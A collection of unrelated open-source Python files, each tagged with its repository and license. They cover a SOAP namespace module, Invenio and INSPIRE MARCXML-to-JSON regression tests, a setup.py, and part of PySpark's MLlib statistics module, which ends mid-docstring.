ident = '$Id: NS.py,v 1.3 2004/01/31 04:20:05 warnes Exp $'
from version import __version__
##############################################################################
# Namespace Class
################################################################################
def invertDict(mapping):
    """Return a new dict mapping each value of *mapping* back to its key.

    If several keys share a value, the key encountered last wins.
    """
    # The parameter was previously named ``dict``, shadowing the builtin;
    # all in-module callers pass it positionally.
    inverted = {}
    for key, value in mapping.items():
        inverted[value] = key
    return inverted
class NS:
    """XML namespace URIs and tag prefixes used by the SOAP marshaller.

    Pure namespace holder; it is never instantiated.
    """
    XML = "http://www.w3.org/XML/1998/namespace"
    ENV = "http://schemas.xmlsoap.org/soap/envelope/"
    ENC = "http://schemas.xmlsoap.org/soap/encoding/"
    # Successive XML Schema revisions (1999, 2000/10, 2001).
    XSD = "http://www.w3.org/1999/XMLSchema"
    XSD2 = "http://www.w3.org/2000/10/XMLSchema"
    XSD3 = "http://www.w3.org/2001/XMLSchema"
    XSD_L = [XSD, XSD2, XSD3]
    EXSD_L= [ENC, XSD, XSD2, XSD3]
    XSI = "http://www.w3.org/1999/XMLSchema-instance"
    XSI2 = "http://www.w3.org/2000/10/XMLSchema-instance"
    XSI3 = "http://www.w3.org/2001/XMLSchema-instance"
    XSI_L = [XSI, XSI2, XSI3]
    URN = "http://soapinterop.org/xsd"
    # For generated messages
    XML_T = "xml"
    ENV_T = "SOAP-ENV"
    ENC_T = "SOAP-ENC"
    XSD_T = "xsd"
    XSD2_T= "xsd2"
    XSD3_T= "xsd3"
    XSI_T = "xsi"
    XSI2_T= "xsi2"
    XSI3_T= "xsi3"
    URN_T = "urn"
    NSMAP = {ENV_T: ENV, ENC_T: ENC, XSD_T: XSD, XSD2_T: XSD2,
             XSD3_T: XSD3, XSI_T: XSI, XSI2_T: XSI2, XSI3_T: XSI3,
             URN_T: URN}
    NSMAP_R = invertDict(NSMAP)
    # Map schema year to its (xsd, xsi) tag pair.
    STMAP = {'1999': (XSD_T, XSI_T), '2000': (XSD2_T, XSI2_T),
             '2001': (XSD3_T, XSI3_T)}
    STMAP_R = invertDict(STMAP)
    def __init__(self):
        # Bug fix: ``raise Error, "..."`` was Python-2-only syntax AND
        # ``Error`` was an undefined name (a NameError at runtime).
        raise TypeError("Don't instantiate this")
|
intip/da-apps
|
plugins/da_centrallogin/modules/soappy/SOAPpy/NS.py
|
Python
|
gpl-2.0
| 3,735
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2010, 2011 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
The Refextract task tests suite for tasks
It requires a fully functional invenio installation.
"""
from invenio.testutils import InvenioTestCase
from invenio.testutils import make_test_suite, run_test_suite
from invenio.refextract_api import update_references, \
RecordHasReferences, \
FullTextNotAvailable
class RefextractApiTest(InvenioTestCase):
    """Regression tests for the refextract API.

    Requires a fully functional Invenio installation.
    """
    def test_no_fulltext(self):
        """Records without fulltext must raise FullTextNotAvailable."""
        # assertRaises replaces the try/self.fail()/except boilerplate and
        # additionally fails when the wrong exception type is raised.
        self.assertRaises(FullTextNotAvailable, update_references, 2000000)
    def test_no_overwrite(self):
        """Refusing to overwrite existing refs raises RecordHasReferences."""
        self.assertRaises(RecordHasReferences, update_references, 92,
                          overwrite=False)
# Collect the regression tests into the suite Invenio's runner expects.
TEST_SUITE = make_test_suite(RefextractApiTest)
if __name__ == '__main__':
    run_test_suite(TEST_SUITE)
|
CERNDocumentServer/invenio
|
modules/docextract/lib/refextract_api_regression_tests.py
|
Python
|
gpl-2.0
| 1,703
|
"""Setup data-structures module."""
from setuptools import setup
# Package metadata for the sorting-algorithms teaching project.
setup(
    name="sorting-algorithms",
    description="Python implementations of classic sorting algorithms",
    # Bug fix: version must be a string, not a float.
    version="0.2",
    # Bug fix: setuptools expects comma-separated strings, not lists,
    # for the author and author_email fields.
    author="Ford Fowler, Claire Gatenby",
    author_email="fordjfowler@gmail.com, clairejgatenby@gmail.com",
    # Bug fix: keyword was misspelled 'licencse' and silently ignored.
    license="MIT",
    package_dir={'': 'src'},
    py_modules=["insertion_sort", 'quick_sort', 'merge_sort'],
    extras_require={
        "test": ["pytest", "pytest-cov", "tox", 'coveralls']
    }
)
|
fordf/sorting-algorithms
|
setup.py
|
Python
|
mit
| 515
|
# -*- coding: utf-8 -*-
#
# This file is part of INSPIRE.
# Copyright (C) 2014-2017 CERN.
#
# INSPIRE is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# INSPIRE is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with INSPIRE. If not, see <http://www.gnu.org/licenses/>.
#
# In applying this license, CERN does not waive the privileges and immunities
# granted to it by virtue of its status as an Intergovernmental Organization
# or submit itself to any jurisdiction.
from __future__ import absolute_import, division, print_function
from dojson.contrib.marc21.utils import create_record
from inspire_dojson.jobs import jobs
from inspire_schemas.api import load_schema, validate
def test_deadline_date_from_046__i():
    """A well-formed 046 $i date is copied verbatim into ``deadline_date``."""
    schema = load_schema('jobs')
    subschema = schema['properties']['deadline_date']
    snippet = (
        '<datafield tag="046" ind1=" " ind2=" ">'
        '  <subfield code="i">2015-12-15</subfield>'
        '</datafield>'
    ) # record/1310294
    expected = '2015-12-15'
    result = jobs.do(create_record(snippet))
    assert validate(result['deadline_date'], subschema) is None
    assert expected == result['deadline_date']
def test_deadline_date_from_046__i__fake_date():
    """A placeholder date like '0000' must not produce a ``deadline_date``."""
    snippet = (
        '<datafield tag="046" ind1=" " ind2=" ">'
        '  <subfield code="i">0000</subfield>'
        '</datafield>'
    ) # record/959114
    result = jobs.do(create_record(snippet))
    assert 'deadline_date' not in result
def test_deadline_date_from_046__i__wrong_date():
    """An impossible day (June 31st) is truncated to a year-month date."""
    schema = load_schema('jobs')
    subschema = schema['properties']['deadline_date']
    snippet = (
        '<datafield tag="046" ind1=" " ind2=" ">'
        '  <subfield code="i">2014-06-31</subfield>'
        '</datafield>'
    ) # record/1279445
    expected = '2014-06'
    result = jobs.do(create_record(snippet))
    assert validate(result['deadline_date'], subschema) is None
    assert expected == result['deadline_date']
def test_closed_date_from_046__l():
    """A well-formed 046 $l date is copied into ``closed_date``."""
    schema = load_schema('jobs')
    subschema = schema['properties']['closed_date']
    snippet = (
        '<datafield tag="046" ind1=" " ind2=" ">'
        '  <subfield code="l">2008-02-11</subfield>'
        '</datafield>'
    ) # record/934304
    expected = '2008-02-11'
    result = jobs.do(create_record(snippet))
    assert validate(result['closed_date'], subschema) is None
    assert expected == result['closed_date']
def test_closed_date_from_046__l_fake_date():
    """A placeholder date like '0000' must not produce a ``closed_date``."""
    snippet = (
        '<datafield tag="046" ind1=" " ind2=" ">'
        '  <subfield code="l">0000</subfield>'
        '</datafield>'
    ) # record/958863
    result = jobs.do(create_record(snippet))
    assert 'closed_date' not in result
def test_date_closed_from_046__i_and_046__l_an_url():
    """046 $l holding a URL goes to ``urls`` while $i stays the deadline."""
    schema = load_schema('jobs')
    subschema_deadline_date = schema['properties']['deadline_date']
    subschema_urls = schema['properties']['urls']
    snippet = (
        '<record>'
        '  <datafield tag="046" ind1=" " ind2=" ">'
        '    <subfield code="i">2012-06-01</subfield>'
        '  </datafield>'
        '  <datafield tag="046" ind1=" " ind2=" ">'
        '    <subfield code="l">http://www.pma.caltech.edu/physics-search</subfield>'
        '  </datafield>'
        '</record>'
    ) # record/963314
    expected_deadline_date = '2012-06-01'
    expected_urls = [
        {'value': 'http://www.pma.caltech.edu/physics-search'},
    ]
    result = jobs.do(create_record(snippet))
    assert validate(result['deadline_date'], subschema_deadline_date) is None
    assert expected_deadline_date == result['deadline_date']
    assert validate(result['urls'], subschema_urls) is None
    assert expected_urls == result['urls']
def test_date_closed_from_046__i_and_046__l_an_email():
    """046 $l holding an email goes to ``reference_email``; $i passes through."""
    schema = load_schema('jobs')
    subschema_deadline_date = schema['properties']['deadline_date']
    subschema_reference_email = schema['properties']['reference_email']
    snippet = (
        '<record>'
        '  <datafield tag="046" ind1=" " ind2=" ">'
        '    <subfield code="l">yejb@smu.edu</subfield>'
        '  </datafield>'
        '  <datafield tag="046" ind1=" " ind2=" ">'
        '    <subfield code="i">8888</subfield>'
        '  </datafield>'
        '</record>'
    ) # record/1089529
    expected_deadline_date = '8888'
    expected_reference_email = ['yejb@smu.edu']
    result = jobs.do(create_record(snippet))
    assert validate(result['deadline_date'], subschema_deadline_date) is None
    assert expected_deadline_date == result['deadline_date']
    assert validate(result['reference_email'], subschema_reference_email) is None
    assert expected_reference_email == result['reference_email']
def test_contact_details_from_marcxml_270_single_p_single_m():
    """One $p name plus one $m email yields a complete contact entry."""
    schema = load_schema('jobs')
    subschema = schema['properties']['contact_details']
    snippet = (
        '<datafield tag="270" ind1=" " ind2=" ">'
        '  <subfield code="m">lindner@mpi-hd.mpg.de</subfield>'
        '  <subfield code="p">Manfred Lindner</subfield>'
        '</datafield>'
    )
    expected = [
        {
            'name': 'Manfred Lindner',
            'email': 'lindner@mpi-hd.mpg.de',
        },
    ]
    result = jobs.do(create_record(snippet))
    assert validate(result['contact_details'], subschema) is None
    assert expected == result['contact_details']
def test_contact_details_from_marcxml_270_double_p_single_m():
    """Ambiguous duplicate $p names are dropped; only the email is kept."""
    schema = load_schema('jobs')
    subschema = schema['properties']['contact_details']
    snippet = (
        '<datafield tag="270" ind1=" " ind2=" ">'
        '  <subfield code="m">lindner@mpi-hd.mpg.de</subfield>'
        '  <subfield code="p">Manfred Lindner</subfield>'
        '  <subfield code="p">Boogeyman</subfield>'
        '</datafield>'
    )
    expected = [
        {'email': 'lindner@mpi-hd.mpg.de'},
    ]
    result = jobs.do(create_record(snippet))
    assert validate(result['contact_details'], subschema) is None
    assert expected == result['contact_details']
def test_contact_details_from_marcxml_270_single_p_double_m():
    """Ambiguous duplicate $m emails are dropped; only the name is kept."""
    schema = load_schema('jobs')
    subschema = schema['properties']['contact_details']
    snippet = (
        '<datafield tag="270" ind1=" " ind2=" ">'
        '  <subfield code="m">lindner@mpi-hd.mpg.de</subfield>'
        '  <subfield code="m">lindner@ecmrecords.com</subfield>'
        '  <subfield code="p">Manfred Lindner</subfield>'
        '</datafield>'
    )
    expected = [
        {'name': 'Manfred Lindner'},
    ]
    result = jobs.do(create_record(snippet))
    assert validate(result['contact_details'], subschema) is None
    assert expected == result['contact_details']
def test_contact_details_from_multiple_marcxml_270():
    """Each repeated 270 field becomes its own contact entry."""
    schema = load_schema('jobs')
    subschema = schema['properties']['contact_details']
    snippet = (
        '<record> '
        '  <datafield tag="270" ind1=" " ind2=" ">'
        '    <subfield code="m">lindner@mpi-hd.mpg.de</subfield>'
        '    <subfield code="p">Manfred Lindner</subfield>'
        '  </datafield>'
        '  <datafield tag="270" ind1=" " ind2=" ">'
        '    <subfield code="p">Wynton Marsalis</subfield>'
        '  </datafield>'
        '</record>'
    )
    expected = [
        {
            'name': 'Manfred Lindner',
            'email': 'lindner@mpi-hd.mpg.de',
        },
        {
            'name': 'Wynton Marsalis',
        },
    ]
    result = jobs.do(create_record(snippet))
    assert validate(result['contact_details'], subschema) is None
    assert expected == result['contact_details']
def test_regions_from_043__a():
    """A plain 043 $a region value is copied into ``regions``."""
    schema = load_schema('jobs')
    subschema = schema['properties']['regions']
    snippet = (
        '<datafield tag="043" ind1=" " ind2=" ">'
        '  <subfield code="a">Asia</subfield>'
        '</datafield>'
    )
    expected = ['Asia']
    result = jobs.do(create_record(snippet))
    assert validate(result['regions'], subschema) is None
    assert expected == result['regions']
def test_regions_from_043__a_corrects_misspellings():
    """Non-canonical region names are normalized (United States -> North America)."""
    schema = load_schema('jobs')
    subschema = schema['properties']['regions']
    snippet = (
        '<datafield tag="043" ind1=" " ind2=" ">'
        '  <subfield code="a">United States</subfield>'
        '</datafield>'
    )
    expected = ['North America']
    result = jobs.do(create_record(snippet))
    assert validate(result['regions'], subschema) is None
    assert expected == result['regions']
def test_regions_from_043__a_splits_on_commas():
    """A comma-separated $a value yields one region per element."""
    schema = load_schema('jobs')
    subschema = schema['properties']['regions']
    snippet = (
        '<datafield tag="043" ind1=" " ind2=" ">'
        '  <subfield code="a">Asia, North America</subfield>'
        '</datafield>'
    )
    expected = ['Asia', 'North America']
    result = jobs.do(create_record(snippet))
    assert validate(result['regions'], subschema) is None
    assert expected == result['regions']
def test_experiments_from_693__e():
    """693 $e alone yields an uncurated experiment (no record link)."""
    schema = load_schema('jobs')
    subschema = schema['properties']['experiments']
    snippet = (
        '<datafield tag="693" ind1=" " ind2=" ">'
        '  <subfield code="e">ALIGO</subfield>'
        '</datafield>'
    ) # record/1375852
    expected = [
        {
            'curated_relation': False,
            'name': 'ALIGO',
        },
    ]
    result = jobs.do(create_record(snippet))
    assert validate(result['experiments'], subschema) is None
    assert expected == result['experiments']
def test_experiments_from_693__e__0():
    """693 $e with a $0 recid yields a curated experiment with a $ref link."""
    schema = load_schema('jobs')
    subschema = schema['properties']['experiments']
    snippet = (
        '<datafield tag="693" ind1=" " ind2=" ">'
        '  <subfield code="e">CERN-LHC-ATLAS</subfield>'
        '  <subfield code="0">1108541</subfield>'
        '</datafield>'
    ) # record/1332138
    expected = [
        {
            'curated_relation': True,
            'name': 'CERN-LHC-ATLAS',
            'record': {
                '$ref': 'http://localhost:5000/api/experiments/1108541',
            },
        },
    ]
    result = jobs.do(create_record(snippet))
    assert validate(result['experiments'], subschema) is None
    assert expected == result['experiments']
def test_experiments_from_693__e__0_and_e():
    """Curated and uncurated 693 fields in one record are both kept."""
    schema = load_schema('jobs')
    subschema = schema['properties']['experiments']
    snippet = (
        '<record>'
        '  <datafield tag="693" ind1=" " ind2=" ">'
        '    <subfield code="e">CERN-LHC-ATLAS</subfield>'
        '    <subfield code="0">1108541</subfield>'
        '  </datafield>'
        '  <datafield tag="693" ind1=" " ind2=" ">'
        '    <subfield code="e">IHEP-CEPC</subfield>'
        '  </datafield>'
        '</record>'
    ) # record/1393583
    expected = [
        {
            'curated_relation': True,
            'name': 'CERN-LHC-ATLAS',
            'record': {
                '$ref': 'http://localhost:5000/api/experiments/1108541',
            },
        },
        {
            'curated_relation': False,
            'name': 'IHEP-CEPC'
        }
    ]
    result = jobs.do(create_record(snippet))
    assert validate(result['experiments'], subschema) is None
    assert expected == result['experiments']
def test_experiments_from_triple_693__e__0():
schema = load_schema('jobs')
subschema = schema['properties']['experiments']
snippet = (
'<record>'
' <datafield tag="693" ind1=" " ind2=" ">'
' <subfield code="e">CERN-NA-049</subfield>'
' <subfield code="0">1110308</subfield>'
' </datafield>'
' <datafield tag="693" ind1=" " ind2=" ">'
' <subfield code="e">CERN-NA-061</subfield>'
' <subfield code="0">1108234</subfield>'
' </datafield>'
' <datafield tag="693" ind1=" " ind2=" ">'
' <subfield code="e">CERN-LHC-ALICE</subfield>'
' <subfield code="0">1110642</subfield>'
' </datafield>'
'</record>'
) # record/1469159
expected = [
{
'curated_relation': True,
'name': 'CERN-NA-049',
'record': {
'$ref': 'http://localhost:5000/api/experiments/1110308',
},
},
{
'curated_relation': True,
'name': 'CERN-NA-061',
'record': {
'$ref': 'http://localhost:5000/api/experiments/1108234',
},
},
{
'curated_relation': True,
'name': 'CERN-LHC-ALICE',
'record': {
'$ref': 'http://localhost:5000/api/experiments/1110642',
},
}
]
result = jobs.do(create_record(snippet))
assert validate(result['experiments'], subschema) is None
assert expected == result['experiments']
def test_institutions_from_110__a():
    """A single 110 $a maps onto an uncurated institution."""
    schema = load_schema('jobs')
    subschema = schema['properties']['institutions']

    snippet = (
        '<datafield tag="110" ind1=" " ind2=" ">'
        ' <subfield code="a">Coll. William and Mary</subfield>'
        '</datafield>'
    )  # record/1427342

    expected = [
        {
            'curated_relation': False,
            'name': 'Coll. William and Mary',
        },
    ]
    record = create_record(snippet)
    result = jobs.do(record)

    assert validate(result['institutions'], subschema) is None
    assert result['institutions'] == expected


def test_institutions_from_double_110__a():
    """Two 110 fields yield two uncurated institutions, in order."""
    schema = load_schema('jobs')
    subschema = schema['properties']['institutions']

    snippet = (
        '<record>'
        ' <datafield tag="110" ind1=" " ind2=" ">'
        ' <subfield code="a">Coll. William and Mary</subfield>'
        ' </datafield>'
        ' <datafield tag="110" ind1=" " ind2=" ">'
        ' <subfield code="a">Jefferson Lab</subfield>'
        ' </datafield>'
        '</record>'
    )  # record/1427342

    expected = [
        {
            'curated_relation': False,
            'name': 'Coll. William and Mary',
        },
        {
            'curated_relation': False,
            'name': 'Jefferson Lab',
        },
    ]
    record = create_record(snippet)
    result = jobs.do(record)

    assert validate(result['institutions'], subschema) is None
    assert result['institutions'] == expected


def test_institutions_from_110__double_a_z():
    """110 with paired $a/$z yields curated institutions with record refs."""
    schema = load_schema('jobs')
    subschema = schema['properties']['institutions']

    snippet = (
        '<datafield tag="110" ind1=" " ind2=" ">'
        ' <subfield code="a">Indiana U.</subfield>'
        ' <subfield code="a">NIST, Wash., D.C.</subfield>'
        ' <subfield code="z">902874</subfield>'
        ' <subfield code="z">903056</subfield>'
        '</datafield>'
    )  # record/1328021

    expected = [
        {
            'curated_relation': True,
            'name': 'Indiana U.',
            'record': {
                '$ref': 'http://localhost:5000/api/institutions/902874',
            },
        },
        {
            'curated_relation': True,
            'name': 'NIST, Wash., D.C.',
            'record': {
                '$ref': 'http://localhost:5000/api/institutions/903056',
            },
        },
    ]
    record = create_record(snippet)
    result = jobs.do(record)

    assert validate(result['institutions'], subschema) is None
    assert result['institutions'] == expected
def test_description_from_520__a():
    """520 $a maps onto ``description``; markup kept, entities decoded."""
    schema = load_schema('jobs')
    subschema = schema['properties']['description']

    snippet = (
        '<datafield tag="520" ind1=" " ind2=" ">'
        ' <subfield code="a">(1) Conduct independent research in string theory related theoretical sciences;<br /> <br /> (2) Advising graduate students in their research;<br /> <br /> (3) A very small amount of teaching of undergraduate courses.&nbsp;</subfield>'
        '</datafield>'
    )  # record/1239755

    expected = '(1) Conduct independent research in string theory related theoretical sciences;<br /> <br /> (2) Advising graduate students in their research;<br /> <br /> (3) A very small amount of teaching of undergraduate courses. '
    record = create_record(snippet)
    result = jobs.do(record)

    assert validate(result['description'], subschema) is None
    assert result['description'] == expected


def test_position_from_245__a():
    """245 $a maps onto ``position``."""
    schema = load_schema('jobs')
    subschema = schema['properties']['position']

    snippet = (
        '<datafield tag="245" ind1=" " ind2=" ">'
        ' <subfield code="a">Neutrino Physics</subfield>'
        '</datafield>'
    )  # record/1467312

    expected = 'Neutrino Physics'
    record = create_record(snippet)
    result = jobs.do(record)

    assert validate(result['position'], subschema) is None
    assert result['position'] == expected
def test_ranks_from_marcxml_656_with_single_a():
    """A single 656 $a maps onto one normalized (upper-cased) rank."""
    schema = load_schema('jobs')
    subschema = schema['properties']['ranks']

    snippet = (
        '<datafield tag="656" ind1=" " ind2=" ">'
        ' <subfield code="a">Senior</subfield>'
        '</datafield>'
    )

    record = create_record(snippet)
    result = jobs.do(record)

    assert validate(result['ranks'], subschema) is None
    assert result['ranks'] == ['SENIOR']


def test_ranks_from_marcxml_656_with_double_a():
    """Two $a values in one 656 map onto two ranks, in order."""
    schema = load_schema('jobs')
    subschema = schema['properties']['ranks']

    snippet = (
        '<datafield tag="656" ind1=" " ind2=" ">'
        ' <subfield code="a">Senior</subfield>'
        ' <subfield code="a">Junior</subfield>'
        '</datafield>'
    )

    expected = [
        'SENIOR',
        'JUNIOR',
    ]
    record = create_record(snippet)
    result = jobs.do(record)

    assert validate(result['ranks'], subschema) is None
    assert result['ranks'] == expected


def test_ranks_from_marcxml_double_656():
    """Two separate 656 fields map onto two ranks, in order."""
    schema = load_schema('jobs')
    subschema = schema['properties']['ranks']

    snippet = (
        '<record>'
        ' <datafield tag="656" ind1=" " ind2=" ">'
        ' <subfield code="a">Senior</subfield>'
        ' </datafield>'
        ' <datafield tag="656" ind1=" " ind2=" ">'
        ' <subfield code="a">Junior</subfield>'
        ' </datafield>'
        '</record>'
    )

    expected = [
        'SENIOR',
        'JUNIOR',
    ]
    record = create_record(snippet)
    result = jobs.do(record)

    assert validate(result['ranks'], subschema) is None
    assert result['ranks'] == expected
|
jacquerie/inspire-dojson
|
tests/test_jobs.py
|
Python
|
gpl-3.0
| 18,740
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time: 2017/6/7 9:50 PM
# @Author: BlackMatrix
# @Site: https://github.com/blackmatrix7
# @File: __init__.py.py
# @Software: PyCharm
__author__ = 'blackmatix'
# Package marker only; nothing happens when the module is run directly.
if __name__ == '__main__':
    pass
|
blackmatrix7/apizen
|
app/demo/__init__.py
|
Python
|
apache-2.0
| 248
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Python package for statistical functions in MLlib.
"""
from pyspark import RDD
from pyspark.mllib.common import callMLlibFunc, JavaModelWrapper
from pyspark.mllib.linalg import Matrix, _convert_to_vector
from pyspark.mllib.regression import LabeledPoint
__all__ = ['MultivariateStatisticalSummary', 'ChiSqTestResult', 'Statistics']
class MultivariateStatisticalSummary(JavaModelWrapper):
    """
    Trait for multivariate statistical summary of a data matrix.

    Each accessor delegates to the wrapped JVM model via
    ``JavaModelWrapper.call``; vector-valued results are converted with
    ``toArray()``.
    """
    def mean(self):
        # Column-wise means.
        return self.call("mean").toArray()

    def variance(self):
        # Column-wise variances.
        return self.call("variance").toArray()

    def count(self):
        # Number of rows; scalar, so no array conversion.
        return self.call("count")

    def numNonzeros(self):
        # Per-column count of non-zero entries.
        return self.call("numNonzeros").toArray()

    def max(self):
        # Column-wise maxima.
        return self.call("max").toArray()

    def min(self):
        # Column-wise minima.
        return self.call("min").toArray()
class ChiSqTestResult(JavaModelWrapper):
    """
    :: Experimental ::

    Object containing the test results for the chi-squared hypothesis test.

    All properties are read-only views onto the wrapped JVM model.
    """
    @property
    def method(self):
        """
        Name of the test method
        """
        return self._java_model.method()

    @property
    def pValue(self):
        """
        The probability of obtaining a test statistic result at least as
        extreme as the one that was actually observed, assuming that the
        null hypothesis is true.
        """
        return self._java_model.pValue()

    @property
    def degreesOfFreedom(self):
        """
        Returns the degree(s) of freedom of the hypothesis test.
        Return type should be Number(e.g. Int, Double) or tuples of Numbers.
        """
        return self._java_model.degreesOfFreedom()

    @property
    def statistic(self):
        """
        Test statistic.
        """
        return self._java_model.statistic()

    @property
    def nullHypothesis(self):
        """
        Null hypothesis of the test.
        """
        return self._java_model.nullHypothesis()

    def __str__(self):
        # Delegate to the JVM model's human-readable summary.
        return self._java_model.toString()
class Statistics(object):
    # Stateless facade over the JVM-side MLlib statistics functions; all
    # methods are static and dispatch through callMLlibFunc.

    @staticmethod
    def colStats(rdd):
        """
        Computes column-wise summary statistics for the input RDD[Vector].

        :param rdd: an RDD[Vector] for which column-wise summary statistics
                    are to be computed.
        :return: :class:`MultivariateStatisticalSummary` object containing
                 column-wise summary statistics.

        >>> from pyspark.mllib.linalg import Vectors
        >>> rdd = sc.parallelize([Vectors.dense([2, 0, 0, -2]),
        ...                       Vectors.dense([4, 5, 0,  3]),
        ...                       Vectors.dense([6, 7, 0,  8])])
        >>> cStats = Statistics.colStats(rdd)
        >>> cStats.mean()
        array([ 4.,  4.,  0.,  3.])
        >>> cStats.variance()
        array([  4.,  13.,   0.,  25.])
        >>> cStats.count()
        3L
        >>> cStats.numNonzeros()
        array([ 3.,  2.,  0.,  3.])
        >>> cStats.max()
        array([ 6.,  7.,  0.,  8.])
        >>> cStats.min()
        array([ 2.,  0.,  0., -2.])
        """
        # Normalize anything vector-like to MLlib vectors before shipping
        # the computation to the JVM.
        cStats = callMLlibFunc("colStats", rdd.map(_convert_to_vector))
        return MultivariateStatisticalSummary(cStats)

    @staticmethod
    def corr(x, y=None, method=None):
        """
        Compute the correlation (matrix) for the input RDD(s) using the
        specified method.
        Methods currently supported: I{pearson (default), spearman}.

        If a single RDD of Vectors is passed in, a correlation matrix
        comparing the columns in the input RDD is returned. Use C{method=}
        to specify the method to be used for single RDD inout.
        If two RDDs of floats are passed in, a single float is returned.

        :param x: an RDD of vector for which the correlation matrix is to be computed,
                  or an RDD of float of the same cardinality as y when y is specified.
        :param y: an RDD of float of the same cardinality as x.
        :param method: String specifying the method to use for computing correlation.
                       Supported: `pearson` (default), `spearman`
        :return: Correlation matrix comparing columns in x.

        >>> x = sc.parallelize([1.0, 0.0, -2.0], 2)
        >>> y = sc.parallelize([4.0, 5.0, 3.0], 2)
        >>> zeros = sc.parallelize([0.0, 0.0, 0.0], 2)
        >>> abs(Statistics.corr(x, y) - 0.6546537) < 1e-7
        True
        >>> Statistics.corr(x, y) == Statistics.corr(x, y, "pearson")
        True
        >>> Statistics.corr(x, y, "spearman")
        0.5
        >>> from math import isnan
        >>> isnan(Statistics.corr(x, zeros))
        True
        >>> from pyspark.mllib.linalg import Vectors
        >>> rdd = sc.parallelize([Vectors.dense([1, 0, 0, -2]), Vectors.dense([4, 5, 0, 3]),
        ...                       Vectors.dense([6, 7, 0, 8]), Vectors.dense([9, 0, 0, 1])])
        >>> pearsonCorr = Statistics.corr(rdd)
        >>> print str(pearsonCorr).replace('nan', 'NaN')
        [[ 1.          0.05564149         NaN  0.40047142]
         [ 0.05564149  1.                 NaN  0.91359586]
         [        NaN         NaN  1.                 NaN]
         [ 0.40047142  0.91359586         NaN  1.        ]]
        >>> spearmanCorr = Statistics.corr(rdd, method="spearman")
        >>> print str(spearmanCorr).replace('nan', 'NaN')
        [[ 1.          0.10540926         NaN  0.4       ]
         [ 0.10540926  1.                 NaN  0.9486833 ]
         [        NaN         NaN  1.                 NaN]
         [ 0.4         0.9486833          NaN  1.        ]]
        >>> try:
        ...     Statistics.corr(rdd, "spearman")
        ...     print "Method name as second argument without 'method=' shouldn't be allowed."
        ... except TypeError:
        ...     pass
        """
        # Check inputs to determine whether a single value or a matrix is needed for output.
        # Since it's legal for users to use the method name as the second argument, we need to
        # check if y is used to specify the method name instead.
        if type(y) == str:
            raise TypeError("Use 'method=' to specify method name.")

        if not y:
            # Single-RDD form: full column-vs-column correlation matrix.
            return callMLlibFunc("corr", x.map(_convert_to_vector), method).toArray()
        else:
            # Two-RDD form: one correlation value between x and y.
            return callMLlibFunc("corr", x.map(float), y.map(float), method)

    @staticmethod
    def chiSqTest(observed, expected=None):
        """
        :: Experimental ::

        If `observed` is Vector, conduct Pearson's chi-squared goodness
        of fit test of the observed data against the expected distribution,
        or againt the uniform distribution (by default), with each category
        having an expected frequency of `1 / len(observed)`.
        (Note: `observed` cannot contain negative values)

        If `observed` is matrix, conduct Pearson's independence test on the
        input contingency matrix, which cannot contain negative entries or
        columns or rows that sum up to 0.

        If `observed` is an RDD of LabeledPoint, conduct Pearson's independence
        test for every feature against the label across the input RDD.
        For each feature, the (feature, label) pairs are converted into a
        contingency matrix for which the chi-squared statistic is computed.
        All label and feature values must be categorical.

        :param observed: it could be a vector containing the observed categorical
                         counts/relative frequencies, or the contingency matrix
                         (containing either counts or relative frequencies),
                         or an RDD of LabeledPoint containing the labeled dataset
                         with categorical features. Real-valued features will be
                         treated as categorical for each distinct value.
        :param expected: Vector containing the expected categorical counts/relative
                         frequencies. `expected` is rescaled if the `expected` sum
                         differs from the `observed` sum.
        :return: ChiSquaredTest object containing the test statistic, degrees
                 of freedom, p-value, the method used, and the null hypothesis.

        >>> from pyspark.mllib.linalg import Vectors, Matrices
        >>> observed = Vectors.dense([4, 6, 5])
        >>> pearson = Statistics.chiSqTest(observed)
        >>> print pearson.statistic
        0.4
        >>> pearson.degreesOfFreedom
        2
        >>> print round(pearson.pValue, 4)
        0.8187
        >>> pearson.method
        u'pearson'
        >>> pearson.nullHypothesis
        u'observed follows the same distribution as expected.'

        >>> observed = Vectors.dense([21, 38, 43, 80])
        >>> expected = Vectors.dense([3, 5, 7, 20])
        >>> pearson = Statistics.chiSqTest(observed, expected)
        >>> print round(pearson.pValue, 4)
        0.0027

        >>> data = [40.0, 24.0, 29.0, 56.0, 32.0, 42.0, 31.0, 10.0, 0.0, 30.0, 15.0, 12.0]
        >>> chi = Statistics.chiSqTest(Matrices.dense(3, 4, data))
        >>> print round(chi.statistic, 4)
        21.9958

        >>> data = [LabeledPoint(0.0, Vectors.dense([0.5, 10.0])),
        ...         LabeledPoint(0.0, Vectors.dense([1.5, 20.0])),
        ...         LabeledPoint(1.0, Vectors.dense([1.5, 30.0])),
        ...         LabeledPoint(0.0, Vectors.dense([3.5, 30.0])),
        ...         LabeledPoint(0.0, Vectors.dense([3.5, 40.0])),
        ...         LabeledPoint(1.0, Vectors.dense([3.5, 40.0])),]
        >>> rdd = sc.parallelize(data, 4)
        >>> chi = Statistics.chiSqTest(rdd)
        >>> print chi[0].statistic
        0.75
        >>> print chi[1].statistic
